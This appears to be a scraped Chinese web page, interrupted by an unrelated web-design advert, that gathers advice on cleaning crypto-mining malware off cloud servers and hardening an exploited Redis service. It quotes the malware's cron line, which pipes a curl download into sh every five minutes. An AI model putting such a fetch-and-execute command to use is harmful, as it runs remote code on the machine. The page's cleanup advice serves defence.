windows服務(wù)器的挖礦進程怎么關(guān)閉刪除

這種病毒騰訊安全提到過

10多年的東坡網(wǎng)站建設(shè)經(jīng)驗，針對設(shè)計、前端、開發(fā)、售后、文案、推廣等六對一服務(wù)，響應(yīng)快，48小時及時工作處理。營銷型網(wǎng)站建設(shè)的優(yōu)勢是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同，自動調(diào)整東坡建站的顯示方式，使網(wǎng)站能夠適用不同顯示終端，在瀏覽器中調(diào)整網(wǎng)站的寬度，無論在任何一種瀏覽器上瀏覽網(wǎng)站，都能展現(xiàn)優(yōu)雅布局與設(shè)計，從而大程度地提升瀏覽體驗。成都創(chuàng)新互聯(lián)公司從事“東坡網(wǎng)站設(shè)計”,“東坡網(wǎng)站推廣”以來，每個客戶項目都認真落實執(zhí)行。

可以去下載安裝一個騰訊御點

打開之后，使用里面的病毒查殺功能，直接就可以查殺這種電腦病毒了

阿里云服務(wù)器被挖礦了怎么辦？(純純電腦小白

1. 關(guān)閉訪問挖礦服務(wù)器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執(zhí)行權(quán)限， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執(zhí)行計劃

5. 執(zhí)行top，查看了一會，沒有再發(fā)現(xiàn)minerd 進程了。

6.檢查/var/spool/cron/目錄下發(fā)現(xiàn)有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL | sh

病毒文件內(nèi)容如下，感興趣的可以研究下：

? View Code

解決minerd并不是最終的目的，主要是要查找問題根源，我的服務(wù)器問題出在了redis服務(wù)了，黑客利用了redis的一個漏洞獲得了服務(wù)器的訪問權(quán)限，然后就注入了病毒，下面是解決辦法和清除工作：

1. 修復(fù) redis 的后門,

配置bind選項, 限定可以連接Redis服務(wù)器的IP, 并修改redis的默認端口6379.

配置AUTH, 設(shè)置密碼, 密碼會以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權(quán)訪問, 也能夠給攻擊者使用config指令加大難度

好消息是Redis作者表示將會開發(fā)”real user”，區(qū)分普通用戶和admin權(quán)限，普通用戶將會被禁止運行某些命令，如conf

2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

阿里云windows服務(wù)器中了挖礦的病毒怎么清理？

光刪除沒用的，因為沒有解決好漏洞。

建議是重做系統(tǒng)，然后找護衛(wèi)神給你做一下系統(tǒng)安全加固，把漏洞徹底堵住才有效果。

阿里云yum工具和出站80端口不可用的問題排查一例

收到阿里云短信/站內(nèi)信提醒，線上某資源被病毒入侵。查看告警詳情及登錄服務(wù)器后確認是感染了DDG挖礦病毒，入侵點是redis。由于病毒行為復(fù)雜，難以徹底清除對系統(tǒng)的修改，決定重置該實例然后重新部署服務(wù)。

實例重置后，發(fā)現(xiàn)yum無法使用。提示yum連接超時，連接的目標(biāo)主機是阿里云的yum源（233.*的IP地址，為外網(wǎng)地址），協(xié)議為HTTP。

進一步測試發(fā)現(xiàn)DNS解析正常，curl訪問內(nèi)網(wǎng)的80端口正常，訪問外網(wǎng)所有80端口均超時，訪問外網(wǎng)的8080/443等部分非80端口正常。

經(jīng)檢查機器的iptables沒有啟用，阿里云安全組出站方向無限制。隨后提交工單聯(lián)系阿里云。

售后客服在工單中答復(fù)，之前機器被檢測到有大量web攻擊行為，阿里云已對該實例進行了出站特定端口封禁處理。在工單內(nèi)表示問題已經(jīng)排除后，客服提前人工解除封禁。

這類封禁處理不會體現(xiàn)在安全組，可以在 云盾安全管控管理控制臺 來查看封禁記錄。這個控制臺也可以在阿里云控制臺右上角賬戶圖標(biāo)--安全管控--處罰列表處進入。另外，處罰通知也會以站內(nèi)信的方式發(fā)送（是否有短信暫不明確），所以及時查收站內(nèi)信非常必要。

作為RAM用戶身份登錄難以保持登錄狀態(tài)，同時主賬號對通知方式的設(shè)置不合理，加上對阿里云檢測和通知機制不夠熟悉，導(dǎo)致這次問題排查持續(xù)時間較久。

阿里云 yum 出站 端口 封禁 入侵